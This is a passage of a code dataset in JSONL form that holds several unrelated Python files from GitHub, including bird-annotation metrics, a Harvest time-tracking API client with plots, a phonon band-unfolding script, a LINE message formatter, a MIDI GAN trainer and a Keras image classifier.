\"id_3\" in dict[species] else 0,\n ]\n )\n\n # -- vocalization_type_count\n db_cursor.execute(\n QUERY_VOCALIZATIOM_TYPE_COUNT.format(\n collection_id=collectionId, id_level=1\n )\n )\n vocalization_type_count = list(db_cursor.fetchall())\n\n # --- length_of_id_level_1_annoations\n db_cursor.execute(\n QUERY_LENGTH_OF_ID_LEVEL_ANOTATIONS.format(\n collection_id=collectionId, id_level=1\n )\n )\n length_of_id_level_1_annoations = list(db_cursor.fetchall())[0][0]\n\n # --- length_of_id_level_2_annoations\n db_cursor.execute(\n QUERY_LENGTH_OF_ID_LEVEL_ANOTATIONS.format(\n collection_id=collectionId, id_level=2\n )\n )\n length_of_id_level_2_annoations = list(db_cursor.fetchall())[0][0]\n\n # -- length_of_id_level_3_annoations\n db_cursor.execute(\n QUERY_LENGTH_OF_ID_LEVEL_ANOTATIONS.format(\n collection_id=collectionId, id_level=3\n )\n )\n length_of_id_level_3_annoations = list(db_cursor.fetchall())[0][0]\n\n # - level_1_annoations_count\n db_cursor.execute(\n QUERY__ID_LEVEL_ANOTATIONS_COUNT.format(\n collection_id=collectionId, id_level=1\n )\n )\n level_1_annoations_count = list(db_cursor.fetchall())[0][0]\n # - level_2_annoations_count\n db_cursor.execute(\n QUERY__ID_LEVEL_ANOTATIONS_COUNT.format(\n collection_id=collectionId, id_level=2\n )\n )\n level_2_annoations_count = list(db_cursor.fetchall())[0][0]\n # - level_3_annoations_count\n db_cursor.execute(\n QUERY__ID_LEVEL_ANOTATIONS_COUNT.format(\n collection_id=collectionId, id_level=3\n )\n )\n level_3_annoations_count = list(db_cursor.fetchall())[0][0]\n\n # - file_count\n db_cursor.execute(QUERY_RECORD_COUNT.format(collection_id=collectionId))\n file_count = list(db_cursor.fetchall())[0][0]\n\n # - file_duration\n db_cursor.execute(QUERY_RECORD_DURATION.format(collection_id=collectionId))\n file_duration = list(db_cursor.fetchall())[0][0]\n\n # - annotation_segments\n db_cursor.execute(\n QUERY_ANNOTATION_INTERVALL_DURATION.format(collection_id=collectionId)\n )\n result = db_cursor.fetchall()\n\n annotated_segments_durations = (\n [x[0] for x in result] if (len(result) > 0) else [0]\n )\n annotated_segments_duration = sum(annotated_segments_durations)\n annotated_segments_max = max(annotated_segments_durations)\n annotated_segments_min = min(annotated_segments_durations)\n annotated_segments_median = median(annotated_segments_durations)\n\n # -- write csv files\n list_to_csv(\n id_level_species_count,\n report_path.joinpath(\"id_level_species_count.csv\"),\n [\n \"latin_name\",\n \"olaf_code\",\n \"german_name\",\n \"english_name\",\n \"id_1\",\n \"id_2\",\n \"id_3\",\n ],\n )\n list_to_csv(\n vocalization_type_count,\n report_path.joinpath(\"vocalization_type_count.csv\"),\n [\n \"latin_name\",\n \"olaf_code\",\n \"german_name\",\n \"english_name\",\n \"vocalization_type\",\n \"count\",\n ],\n )\n\n # print(annotated_segments)\n # print(sound_signals_total)\n # print(level_1_annoations_count)\n # print(length_of_id_level_1_annoations)\n lines = [\n (\"annotated_file_count\", file_count),\n (\"annotated_file_duration\", file_duration),\n (\"annotated_segments\", annotated_segments),\n (\"annotated_segments_duration\", annotated_segments_duration),\n (\"annotated_segments_max\", annotated_segments_max),\n (\"annotated_segments_min\", annotated_segments_min),\n (\"annotated_segments_median\", annotated_segments_median),\n (\"sound_signals_total\", sound_signals_total),\n (\"click_count\", clicks_count),\n (\"level_1_annoations_count\", level_1_annoations_count),\n (\"length_of_id_level_1_annoations\", length_of_id_level_1_annoations),\n (\"level_2_annoations_count\", level_2_annoations_count),\n (\"length_of_id_level_2_annoations\", length_of_id_level_2_annoations),\n (\"level_3_annoations_count\", level_3_annoations_count),\n (\"length_of_id_level_3_annoations\", length_of_id_level_3_annoations),\n ]\n metrics_filepath = report_path.joinpath(\"metrics.txt\")\n with open(metrics_filepath, \"w\") as text_file:\n for line in lines:\n text_file.write(\"{}: {}\\n\".format(line[0], line[1]))\n if missing_species is not None:\n missing_species_filepath = report_path.joinpath(\"missing_species.txt\")\n with open(missing_species_filepath, \"w\") as text_file:\n text_file.writelines(list(map(lambda x: x + \"\\n\", missing_species)))\n\n # print(\"End\")\n\n\nif __name__ == \"__main__\":\n create_metrics()\n","repo_name":"hdogan84/database","sub_path":"src/create_import_report_olaf.py","file_name":"create_import_report_olaf.py","file_ext":"py","file_size_in_byte":12809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23596476944","text":"import requests\nimport os\nimport copy\nimport datetime\nfrom collections import defaultdict\nfrom typing import List\n\nfrom django.conf import settings\n\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as lns\n\n\n# === UTILITY FUNCTIONS\n\ndef yesterday() -> datetime.date:\n today = datetime.date.today()\n return today - datetime.timedelta(days=1)\n\n\ndef get_week_by_day(reference_datetime: datetime.datetime) -> List[datetime.datetime]:\n reference_datetime = datetime.datetime(year=reference_datetime.year,\n month=reference_datetime.month,\n day=reference_datetime.day)\n week_datetimes = [reference_datetime]\n\n for i in range(1, reference_datetime.weekday() + 1):\n _datetime = reference_datetime - datetime.timedelta(days=i)\n week_datetimes = [_datetime] + week_datetimes\n\n for j in range(1, 6 - reference_datetime.weekday() + 1):\n _datetime = reference_datetime + datetime.timedelta(days=j)\n week_datetimes = week_datetimes + [_datetime]\n\n return week_datetimes\n\n\n# === DATA PROCESSING\n\nclass HarvestApi:\n\n def __init__(self):\n self.headers = {\n 'Authorization': f'Bearer {settings.HARVEST_ACCESS_TOKEN}',\n 'Harvest-Account-Id': f'{settings.HARVEST_ACCOUNT_ID}',\n 'User-Agent': 'Electronic Heart'\n }\n self.session = requests.Session()\n self.session.headers.update(self.headers)\n self.url = settings.HARVEST_API_URL\n\n def get(self, endpoint: str, params: dict = {}) -> requests.Response:\n \"\"\"\n\n :raises requests.exceptions.HTTPError: In case the request is invalid, meaning the response has a non\n 2xx status code!\n :param endpoint:\n :param params:\n :return:\n \"\"\"\n url = os.path.join(self.url, endpoint)\n print(self.url)\n print(url)\n response = self.session.get(url, params=params)\n\n return response\n\n def get_all_time_entries(self) -> List[dict]:\n \"\"\"\n Fetches and returns a list of all time entry objects from the api.\n\n :return:\n \"\"\"\n time_entries = []\n\n next_page = 1\n while next_page is not None:\n try:\n response = self.get('time_entries', {'page': next_page})\n # This method will make the response actually raise an exception if the response status is not 2xx!\n # Usually the get call would not do this and only raise an error if there was an actual timeout or smth\n # like that. I like this, since it explicitly forces the top layers to handle a bad return.\n response.raise_for_status()\n\n data = response.json()\n time_entries += data['time_entries']\n next_page = data['next_page']\n except requests.exceptions.HTTPError as e:\n print('Harvest Error: ' + str(e))\n break\n\n return time_entries\n\n\ndef create_projects_dict(time_entries: List[dict]) -> dict:\n projects_dict = copy.deepcopy(settings.HARVEST_PROJECTS)\n\n # 1.Adding the raw time entry list to each project\n for project_id, project_data in projects_dict.items():\n project_data['time_entries'] = [time_entry\n for time_entry in time_entries\n if (time_entry['project']['name'], time_entry['task']['name']) == project_id]\n\n # 2.We want a processed data structure from these raw entries which tells us the cumulative time spent\n # per project and per day.\n for project_id, project_data in projects_dict.items():\n daily_hours = defaultdict(float)\n\n for time_entry in project_data['time_entries']:\n date = time_entry['spent_date']\n daily_hours[date] += time_entry['hours']\n\n project_data['daily_hours'] = dict(daily_hours)\n\n return projects_dict\n\n\ndef get_projects_total_over_timespan(projects_dict: dict,\n start_datetime: datetime.datetime,\n end_datetime: datetime.datetime):\n projects_total = {project_id: 0 for project_id in projects_dict.keys()}\n\n for project_id, project_data in projects_dict.items():\n\n for date_string, hours in project_data['daily_hours'].items():\n _datetime = datetime.datetime.strptime(date_string, settings.HARVEST_DATETIME_FORMAT)\n if start_datetime <= _datetime <= end_datetime:\n projects_total[project_id] += hours\n\n return projects_total\n\n\n# === CREATING OF PLOTS\n\n\ndef plot_daily_hours_over_timespan(axes: plt.Axes,\n projects_dict: dict,\n start_datetime=datetime.datetime.now(),\n end_datetime=datetime.datetime.now(),\n ) -> plt.Axes:\n\n # ~ Populating the plot\n dts = [(start_datetime + datetime.timedelta(days=offset))\n for offset in range((end_datetime - start_datetime).days + 1)]\n\n for index, dt in enumerate(dts, start=1):\n\n date_string = dt.strftime(settings.HARVEST_DATETIME_FORMAT)\n previous_hours = 0\n for project_id, project_data in projects_dict.items():\n if date_string in project_data['daily_hours']:\n hours = project_data['daily_hours'][date_string]\n axes.bar(x=index,\n bottom=previous_hours,\n height=hours,\n color=project_data['color'])\n\n previous_hours += hours\n\n axes.text(x=index,\n y=previous_hours + 0.1,\n s=f'{previous_hours:0.2f}',\n fontsize='large',\n ha='center')\n\n # ~ Additional plot info\n yticks = list(range(1, len(dts) + 1))\n axes.set_xlim(yticks[0] - 0.5, yticks[-1] + 0.5)\n axes.set_xticks(yticks)\n axes.set_xticklabels([dt.strftime('%d.%m.%Y\\n(%A)') for dt in dts])\n axes.set_ylim(0, 12)\n axes.set_title('Daily hours')\n\n custom_lines = []\n custom_labels = []\n for project_id, project_data in projects_dict.items():\n custom_lines.append(lns.Line2D([0], [0], color=project_data['color'], lw=3))\n custom_labels.append(project_data['label'])\n axes.legend(custom_lines, custom_labels)\n\n return axes\n\n\ndef plot_project_total_over_timespan(axes: plt.Axes,\n projects_dict: dict,\n start_datetime=datetime.datetime.now(),\n end_datetime=datetime.datetime.now()\n ) -> plt.Axes:\n # Convenience feature: The start and end datetime can be given as strings, as that\n # is often a lot easier for the user. These will be automatically converted into\n # datetime objects\n datetime_format = '%Y-%m-%d'\n if isinstance(start_datetime, str):\n start_datetime = datetime.datetime.strptime(start_datetime, datetime_format)\n if isinstance(end_datetime, str):\n end_datetime = datetime.datetime.strptime(end_datetime, datetime_format)\n\n # ~ Population plot\n projects_total = defaultdict(float)\n for index, (project_id, project_data) in enumerate(projects_dict.items(), start=1):\n\n for date_string, hours in project_data['daily_hours'].items():\n dt = datetime.datetime.strptime(date_string, datetime_format)\n if start_datetime <= dt <= end_datetime:\n projects_total[project_id] += hours\n\n # Now after the previous loop over all entries of daily working hours\n # have been processed we can plot the final value for the current project\n total_hours = projects_total[project_id]\n axes.barh(y=index,\n width=total_hours,\n label=project_data['label'],\n color=project_data['color'])\n\n # Besides the bar itself there will also be a text label with the actual value\n axes.text(y=index,\n x=total_hours + 0.05,\n s=f'{total_hours:0.2f}',\n fontsize='large',\n va='center')\n\n # ~ Additional plot info\n total_hours = sum(hours for hours in projects_total.values())\n max_hours = max(hours for hours in projects_total.values())\n axes.set_title(f'Total hours: {total_hours:0.2f}')\n axes.set_yticks(list(range(1, len(projects_total) + 1)))\n axes.set_yticklabels([d['label'] for d in projects_dict.values()])\n axes.set_xlabel('time in hours')\n axes.set_xlim(0, max_hours + 2)\n axes.legend()\n\n return axes\n\n\ndef plot_weekly_total_by_project(axes: plt.Axes,\n projects_dict: dict,\n start_datetime: datetime.datetime,\n end_datetime: datetime.datetime,\n datetime_format: str = '%Y-%m-%d',\n cumulative_color=(0, 0, 0, 0.1)):\n # ~ Generating the weeks\n current_week = get_week_by_day(start_datetime)\n weeks = [current_week]\n while current_week[-1] < end_datetime:\n current_week = [dt + datetime.timedelta(weeks=1) for dt in current_week]\n weeks.append(current_week)\n\n # ~ Populating the plot\n axes_total = axes.twinx()\n # axes_total, axes = axes, axes_total\n\n projects_weekly_total = defaultdict(list)\n indices = list(range(1, len(weeks) + 1))\n for index, week in zip(indices, weeks):\n\n projects_total = get_projects_total_over_timespan(projects_dict,\n start_datetime=week[0],\n end_datetime=week[-1])\n print(list(projects_dict.values())[0].keys())\n print(week[0], week[1], projects_total)\n for project_id, project_data in projects_dict.items():\n weekly_total = projects_total[project_id]\n projects_weekly_total[project_id].append(weekly_total)\n axes.scatter(x=index,\n y=weekly_total,\n color=project_data['color'],\n lw=3)\n\n total = sum(hours for hours in projects_total.values())\n axes_total.bar(x=index,\n height=total,\n width=0.4,\n color=cumulative_color)\n\n for project_id, project_data in projects_dict.items():\n axes.plot(indices, projects_weekly_total[project_id],\n color=project_data['color'],\n label=project_data['label'],\n lw=3)\n\n # ~ additional plot info\n axes.set_title('Total weekly hours')\n axes.set_ylabel('time in hours')\n axes.set_ylim(0)\n axes.set_xticks(indices)\n axes.set_xticklabels([week[0].strftime(datetime_format) for week in weeks])\n axes.legend()\n\n axes_total.set_ylim(0, 50)\n axes_total.set_ylabel('cummulative time in hours', color='gray')\n axes_total.tick_params(labelcolor='gray')\n\n return axes\n","repo_name":"the16thpythonist/electronicheart","sub_path":"hours/harvest.py","file_name":"harvest.py","file_ext":"py","file_size_in_byte":11152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72256423849","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"sweetpea\",\n version=\"0.0.20\",\n author=\"Annie Cherkaev, Ben Draut\",\n author_email=\"annie.cherk@gmail.com, drautb@cs.utah.edu\",\n description=\"A language for synthesizing randomized experimental designs\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/anniecherk/sweetpea-py\",\n packages=setuptools.find_packages(),\n install_requires=[\n 'docker',\n 'requests',\n 'ascii-graph'\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n test_suite='nose.collector',\n tests_require=['nose']\n)\n","repo_name":"anniecherk/sweetpea-py","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40637040418","text":"mytuple1 = (1,2,3,4,5)\nprint(mytuple1)\n\nfrom collections import namedtuple\n\ncar = namedtuple('car', ['make', 'model', 'price', 'horsepower', 'seats'])\n\nchevy_blazer = car('Chevrolet', 'Blazer', 32000, 275, 8)\n\nprint(chevy_blazer)\n","repo_name":"davidseungjin/Python","sub_path":"ch0301_related2.py","file_name":"ch0301_related2.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34210501299","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport math\nimport argparse\nimport numpy as np\nimport typing as tp\n\nPROG = os.path.basename(sys.argv[0])\n\ntry:\n import rsp2\n import unfold_lib\n import unfold\n from rsp2.io import dwim\n from unfold_lib import coalesce\nexcept ImportError:\n info = lambda s: print(s, file=sys.stderr)\n info('Please add the following to your PYTHONPATH:')\n info(' (rsp2 source root)/scripts')\n info(' (rsp2 source root)/src/python')\n info(\"Or alternatively, create a conda environment from rsp2's environment.yml\")\n sys.exit(1)\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\n 'A more limited form of unfold.py that extracts band data unfolded onto '\n \"just one or more specific kpoints (using some of unfold.py's intermediate \"\n \"output files as input).\",\n )\n parser.add_argument(\n 'STRUCTURE', help=\n 'Path to initial structure in rsp2 directory structure format.',\n )\n parser.add_argument(\n '--multi-qpoint-file', required=True, help=\n 'Path to multi-qpoint.yaml file (see the unfold.py script for more details)',\n )\n\n parser.add_argument(\n '--coalesce-threshold', type=float,\n metavar='THRESHOLD', help=\n 'Coalesce modes of similar eigenvalue into one for reduced output size. '\n 'When using this, some mode probabilities may exceed 1.'\n )\n parser.add_argument(\n '--probs-threshold', type=float, default=1e-7, help=\n 'Truncate probabilities smaller than this when writing output. '\n )\n\n v2_to_v3 = lambda v2: np.array(list(v2) + [0])\n jorio_radians = lambda rad: v2_to_v3(jorio_rband_pfrac(rad))\n jorio_degrees = lambda deg: parse_jorio_radians(math.radians(deg))\n parse_jorio_radians = lambda s: jorio_radians(float(s))\n parse_jorio_degrees = lambda s: jorio_degrees(float(s))\n parser.set_defaults(kpoints=[])\n parser.add_argument(\n '--jorio-degrees',\n action='append', dest='kpoints', type=parse_jorio_degrees, help=\n \"Unfold onto Jorio's q(theta), for the specified angle in degrees.\",\n )\n parser.add_argument(\n '--jorio-radians',\n action='append', dest='kpoints', type=parse_jorio_radians, help=\n \"Unfold onto Jorio's q(theta), for the specified angle in radians.\",\n )\n parser.add_argument(\n '--kpoint',\n action='append', dest='kpoints', type=unfold.TaskQpointSfrac.parse, help=\n 'Unfold onto this K-point, in fractional coordinates of the '\n 'primitive reciprocal cell, as a whitespace-separated list of '\n '3 floats, or rational numbers.'\n )\n\n parser.set_defaults(output=[])\n parser.add_argument(\n '--output', action='append', help=\n 'Output file for a single kpoint. Must be specified once for each '\n \"option that defines a kpoint. (any format supported by rsp2's DWIM\"\n 'IO mechanisms, e.g. .json.xz)',\n )\n args = parser.parse_args()\n\n if not args.kpoints:\n parser.error('No points specified to unfold onto!')\n\n if len(args.kpoints) != len(args.output):\n parser.error('Number of kpoints to unfold onto must match number of output files!')\n\n sdir = rsp2.io.structure_dir.from_path(args.STRUCTURE)\n multi_qpoint_data = unfold.TaskMultiQpointData.read_file(args.multi_qpoint_file, probs_threshold=1e-7)\n main_(\n sdir=sdir,\n multi_qpoint_data=multi_qpoint_data,\n kpoints_pfrac=np.array(args.kpoints),\n output_paths=args.output,\n coalesce_threshold=args.coalesce_threshold,\n probs_threshold=args.probs_threshold,\n )\n\ndef main_(\n sdir: rsp2.io.structure_dir.StructureDir,\n multi_qpoint_data: dict,\n kpoints_pfrac: np.ndarray,\n output_paths: tp.List[str],\n coalesce_threshold: tp.Optional[float],\n probs_threshold: float,\n):\n sc_matrix = sdir.layer_sc_matrices[0]\n supercell = unfold_lib.Supercell(sc_matrix)\n super_lattice = sdir.structure.lattice.matrix\n prim_lattice = np.linalg.inv(sc_matrix) @ super_lattice\n\n super_recip_lattice = np.linalg.inv(super_lattice).T\n prim_recip_lattice = np.linalg.inv(prim_lattice).T\n\n kpoints_pfrac %= 1\n\n resampled = unfold.resample_qg_indices(\n super_lattice=super_lattice,\n supercell=supercell,\n qpoint_sfrac=multi_qpoint_data['qpoint-sfrac'],\n path_kpoint_pfracs=np.array(kpoints_pfrac),\n )\n resampled_qs = resampled['Q']\n resampled_gs = resampled['G']\n\n closest_images_sfrac = np.array(multi_qpoint_data['qpoint-sfrac'])[resampled_qs] + supercell.gpoint_sfracs()[resampled_gs]\n closest_images_cart = closest_images_sfrac @ super_recip_lattice\n closest_images_cart = unfold_lib.reduce_carts(closest_images_cart, prim_recip_lattice)\n\n kpoints_cart = kpoints_pfrac @ prim_recip_lattice\n\n # The point we actually unfolded onto might not be the point we wanted.\n # Check how far the two points are from each other and record it.\n errors_cart = np.array([\n unfold_lib.shortest_image_norm(diff, prim_recip_lattice)\n for diff in kpoints_cart - closest_images_cart\n ])\n\n for i in range(len(resampled_qs)):\n resampled_q = resampled_qs[i]\n resampled_g = resampled_gs[i]\n error_distance = np.linalg.norm(errors_cart[i])\n\n ev_frequencies = multi_qpoint_data['mode-data']['ev_frequencies'][resampled_q]\n ev_probs = multi_qpoint_data['probs'][resampled_q].T[resampled_g]\n ev_probs = np.asarray(ev_probs.todense()).squeeze()\n\n if coalesce_threshold is not None:\n splits = list(unfold_lib.coalesce.get_splits(ev_frequencies, coalesce_threshold))\n ev_probs = unfold_lib.coalesce.coalesce(splits, ev_probs, 'sum')\n ev_probs = ev_probs[splits[:-1]]\n ev_frequencies = unfold_lib.coalesce.coalesce(splits, ev_frequencies, 'mean')\n ev_frequencies = ev_frequencies[splits[:-1]]\n\n mask = ev_probs > probs_threshold\n ev_probs = ev_probs[mask]\n ev_frequencies = ev_frequencies[mask]\n\n dwim.to_path(output_paths[i], {\n 'sample-error-distance': error_distance,\n 'ev-probs': ev_probs.tolist(),\n 'ev-frequencies': ev_frequencies.tolist(),\n })\n\n# ------------------------------------------------------\n\ndef rotation_matrix_22(angle):\n c, s = math.cos(angle), math.sin(angle)\n return np.array([[c, -s], [s, c]])\n\ndef rotation_matrix_33(angle):\n c, s = math.cos(angle), math.sin(angle)\n return np.array([[c, -s, 0], [s, c, 0], [0, 0, 1]])\n\ndef jorio_rband_pfrac(twist_angle):\n jorio_lattice = np.array([[1, 0], [-0.5, 0.5*3**0.5]]) @ rotation_matrix_22(np.radians(90)).T\n\n cos, sin = math.cos(twist_angle), math.sin(twist_angle)\n q_jorio_cart = (3**-0.5) * np.array([\n -(1 - cos) - 3**0.5 * sin,\n -3**0.5 * (1 - cos) + sin,\n ])\n\n q_pfrac = q_jorio_cart @ jorio_lattice.T\n return q_pfrac\n\n# ------------------------------------------------------\n\ndef warn(*args, **kw):\n print(f'{PROG}:', *args, file=sys.stderr, **kw)\n\ndef die(*args, code=1):\n warn('Fatal:', *args)\n sys.exit(code)\n\n# ------------------------------------------------------\n\nif __name__ == '__main__':\n main()\n","repo_name":"ExpHP/rsp2","sub_path":"scripts/unfold-special.py","file_name":"unfold-special.py","file_ext":"py","file_size_in_byte":7302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38995919947","text":"from datetime import datetime\nimport copy\n\n\nclass lineMessageFormate:\n def __init__(self,dataModel,messageType):\n \n self.dataModel = dataModel\n self.messageType = messageType\n self.ReceiverLineIdList = []\n self.messages = []\n self.content = []\n\n def Addcontent(self,imageUrl,title,text):\n \n data = {\n \"imageUrl\":imageUrl,\n \"title\":title,\n \"text\":text\n }\n \n self.content.append(data)\n \n \n def formate_member(self):\n \n for model in self.dataModel:\n \n print(model)\n\n self.ReceiverLineIdList.append(model[\"lineId\"]) \n \n self.Addcontent(model[\"sourceImage\"][\"imageUrl\"],\"來源影像\",\"時間: {} \\n 簽到結果:成功\".format(datetime.fromtimestamp(int(model['sourceImage']['timestamp'] + 28800))))\n self.Addcontent(model[\"sourceFaceImage\"][\"imageUrl\"],\"來源人臉\",\"信心指數:{} %\".format(round(model[\"sourceFaceImage\"][\"confidence\"],2)))\n self.Addcontent(model[\"registrationFaceImage\"][\"imageUrl\"],\"註冊影像\",\"姓名:{}\\nfaceId:{}\\n相似度:{}%\"\n .format(model[\"registrationFaceImage\"][\"memberId\"],model[\"registrationFaceImage\"][\"faceId\"][0:18],round(model[\"registrationFaceImage\"][\"similarity\"],2)))\n \n\n \n message = {\n \"messageType\": self.messageType,\n \"content\": copy.deepcopy(self.content)\n \n }\n \n self.messages.append(message)\n \n self.content.clear()\n \n def formate_Notmember(self):\n \n counter = 0\n \n \n #for lineid in self.dataModel[\"notMemberAlertMessage\"][\"receiverLineIdList\"]:\n self.ReceiverLineIdList = self.dataModel[\"receiverLineIdList\"]\n \n for model in self.dataModel[\"notMemberFaceImageList\"]:\n \n self.Addcontent(self.dataModel[\"sourceImage\"][\"imageUrl\"],\"來源影像\",\"來源人數:{}\\n非成員人數:{}\\n時間:{}\"\n .format(self.dataModel[\"sourceImage\"][\"personCount\"],self.dataModel[\"sourceImage\"][\"notMemberCount\"],datetime.fromtimestamp(int(self.dataModel['sourceImage']['timestamp'] + 28800))))\n self.Addcontent(model[\"imageUrl\"],\"非成員\"+str(counter),\"信心指數:{} %\".format(round(model[\"confidence\"],2)))\n\n message = {\n \"messageType\": self.messageType,\n \"content\": copy.deepcopy(self.content)\n \n }\n\n counter += 1\n \n self.messages.append(message)\n \n self.content.clear()\n \n def formate_quota(self):\n \n self.ReceiverLineIdList = self.dataModel[\"receiverLineIdList\"]\n \n for model in self.dataModel[\"notMemberFaceImageList\"]:\n \n message = {\n \"messageType\": self.messageType,\n \"content\": \"流量已用盡,請聯絡供應服務商\"\n \n }\n \n\n self.messages.append(message)\n \n \n def getdata(self):\n \n LinepushModel = {\n \"receiverLineIdList\" : self.ReceiverLineIdList,\n \"messages\" : self.messages\n }\n \n print(LinepushModel)\n \n return self.ReceiverLineIdList , self.messages","repo_name":"ilab-1624/weekAPIGateway","sub_path":"lambda/EdwardWeb_alertNotify/dataFormated.py","file_name":"dataFormated.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5711597619","text":"#!/usr/bin/env python3\n###########################################################\n# Authors: Joel Anyanti, Jui-Chieh Chang, Alex Condotti\n# Carnegie Mellon Univerity\n# 11-785 (Introduction to Deep Learning)\n#\n# main.py\n###########################################################\n# Imports\n###########################################################\nimport sys, os, time\nimport imageio\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nfrom IPython.display import Image\n\nfrom config import *\nfrom model import Generator, Discriminator, train\nfrom loader import POPDataset, BarDataset, parse_data\nfrom util import *\n\n###########################################################\n# Model Run\n###########################################################\ndef main():\n # Setup CUDA device\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n has_gpu = torch.cuda.is_available()\n\n # Training hyper parameters\n lr = 2e-4\n lr_scale_g = 0.25\n betas = (0.5, 0.99)\n epochs = 20\n nz = 30\n is_chord = False\n chord_dims = (13,1)\n\n # Load data\n #train_dataset = POPDataset(\"encodings.npz\")\n train_data = parse_data(\"../dataset\")\n train_dataset = BarDataset(train_data)\n\n train_loader = DataLoader(train_dataset, batch_size=N_BATCH, shuffle=False,\n num_workers=0, drop_last=True)\n\n # Model instantiation\n torch.cuda.empty_cache()\n modelG = Generator(nz=nz, is_chord=is_chord, chord_dims=chord_dims)\n modelD = Discriminator(is_chord=is_chord, chord_dims=chord_dims)\n modelG.to(device)\n modelD.to(device)\n\n # Model optimizers\n optG = torch.optim.Adam(modelG.parameters(), lr=lr, betas=betas)\n optD = torch.optim.Adam(modelD.parameters(), lr=lr*lr_scale_g, betas=betas)\n\n # Model Criterion\n criterion = nn.BCELoss()\n\n # Model Train\n training_run = train(model=(modelG, modelD), train_loader=train_loader,\n opt=(optG, optD), criterion=criterion, nz=nz,\n device=device, is_chord=is_chord, epochs=epochs)\n\n plot_loss(*extract_loss(training_run))\n\nif __name__ == '__main__':\n main()\n","repo_name":"janyanti/MidiNetGan","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22950441063","text":"#!/bin/bash\nimport os\nimport sys\n\n\n\n#rate = [(0.29, 0.39), (0.30, 0.40), (0.31, 0.41)]\nrate = [(0.37, 0.47), (0.4, 0.5)]\n\nfor (i,j) in rate:\n filename = str(i) + \"_\" + str(j)\n os.system(\"mkdir \" + filename) \n os.chdir(filename)\n command1 = \"nohup python3 /home/yulin/liyanbo/script/HaploDivide/version2/main.py ../chr1.sorted.bam /home/yanbo/bio/Project/Guofei/reference/GRCh37_hg19/first_1_1*.fa \" + str(i) + \" \" + str(j) + \" 0 20 > main.log &\"\n #command1 = \"nohup sh ../../check.sh 20 >check.log &\"\n os.system(command1)\n os.chdir(\"../\")\n\n'''\nprint \"\\n\"\nfor (i,j) in rate:\n filename = str(i) + \"_\" + str(j)\n os.chdir(filename)\n os.system(\"tail -1 snp_result\")\n os.chdir(\"../\")\n\nprint \"\\n\"\nfor (i,j) in rate:\n filename = str(i) + \"_\" + str(j)\n os.chdir(filename)\n os.system(\"tail -1 delete_filter.log\")\n os.chdir(\"../\")\n\nprint \"\\n\"\nfor (i,j) in rate:\n filename = str(i) + \"_\" + str(j)\n os.chdir(filename)\n os.system(\"tail -1 delete_nofilter.log\")\n os.chdir(\"../\")\n\nprint \"\\n\"\nfor (i,j) in rate:\n filename = str(i) + \"_\" + str(j)\n os.chdir(filename)\n os.system(\"tail -1 insert_filter.log\")\n os.chdir(\"../\")\n\n\nprint \"\\n\"\nfor (i,j) in rate:\n filename = str(i) + \"_\" + str(j)\n os.chdir(filename)\n os.system(\"tail -1 insert_nofilter.log\")\n os.chdir(\"../\")\n'''\n","repo_name":"yanboANU/HaploDivide","sub_path":"script/step3.py","file_name":"step3.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41720542825","text":"import numpy as np\nfrom keras.models import load_model\nimport tensorflow as tf\nfrom PIL import Image\nimport keras_cv\n\n\ndef load_image(filename):\n img = tf.keras.utils.load_img(filename, target_size=(32, 32))\n img = tf.keras.utils.img_to_array(img)\n img = img.reshape(32, 32, 3)\n return img\n\n\ndef image_classify(filename, model):\n classes = [\"Airplane\", \"Automobile\", \"Bird\", \"Cat\", \"Deer\", \"Dog\", \"Frog\", \"Horse\", \"Ship\", \"Truck\"]\n img = load_image(filename)\n model = load_model(model)\n result = model.predict(np.expand_dims(img, axis=0))\n prediction = result[0]\n result = np.argmax(prediction)\n if prediction[result] < 0.85:\n return [\"Invalid photo\"]\n else:\n return [classes[result], float(str(prediction[result])[:4])]\n ","repo_name":"smilecool2012/GoIT_Data_Science_Project","sub_path":"fileuploader/keras_model.py","file_name":"keras_model.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29577396042","text":"import os\n\nfrom azure.identity import ClientSecretCredential\nfrom azure.mgmt.resource import ResourceManagementClient\nfrom azure.mgmt.network import NetworkManagementClient\nfrom azure.mgmt.compute import ComputeManagementClient\n\nfrom img_proof import ipa_utils\nfrom img_proof.ipa_constants import AZURE_DEFAULT_TYPE, AZURE_DEFAULT_USER\nfrom img_proof.ipa_exceptions import AzureCloudException\nfrom img_proof.ipa_cloud import IpaCloud\nfrom img_proof.azure_creds_wrapper import CredentialWrapper\n\n\nclass AzureCloud(IpaCloud):\n \"\"\"Class for testing instances in Azure.\"\"\"\n cloud = 'azure'\n\n def post_init(self):\n \"\"\"Initialize Azure cloud framework class.\"\"\"\n\n self.vnet_name = (\n self.custom_args.get('vnet_name')\n or self.ipa_config['vnet_name']\n )\n 